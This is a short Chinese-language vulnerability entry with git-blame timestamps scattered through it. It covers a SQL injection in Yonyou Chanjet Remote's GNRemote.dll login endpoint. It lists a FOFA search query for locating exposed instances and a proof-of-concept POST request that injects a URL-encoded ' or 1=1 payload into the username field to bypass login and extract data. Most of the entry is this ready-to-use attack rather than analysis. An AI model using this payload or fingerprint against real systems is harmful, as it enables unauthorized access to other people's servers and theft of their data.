2022-10-17 17:17:13 +08:00
|
|
|
|
# 用友 畅捷通远程通 GNRemote.dll SQL注入漏洞
|
|
|
|
|
|
|
|
|
|
|
|
## 漏洞描述
|
|
|
|
|
|
|
|
|
|
|
|
用友 畅捷通远程通 GNRemote.dll SQL注入漏洞,攻击者通过SQL注入可以获取服务器敏感信息或者使用万能密码登录设备
|
|
|
|
|
|
|
|
|
|
|
|
## 漏洞影响
|
|
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
|
用友 畅捷通远程通
|
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
|
|
## FOFA
|
|
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
|
body="远程通CHANJET_Remote"
|
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
|
|
## 漏洞复现
|
|
|
|
|
|
|
|
|
|
|
|
登录页面
|
|
|
|
|
|
|
2022-12-05 11:09:28 +08:00
|
|
|
|
|
2022-10-17 17:17:13 +08:00
|
|
|
|
|
|
|
|
|
|
验证POC
|
|
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
|
POST /GNRemote.dll?GNFunction=LoginServer&decorator=text_wrap&frombrowser=esl
|
|
|
|
|
|
|
|
|
|
|
|
username=%22'%20or%201%3d1%3b%22&password=%018d8cbc8bfc24f018&ClientStatus=1
|
|
|
|
|
|
```
|
|
|
|
|
|
|
2022-12-05 11:09:28 +08:00
|
|
|
|
|
2022-10-17 17:17:13 +08:00
|
|
|
|
|
2022-12-05 11:09:28 +08:00
|
|
|
|
|
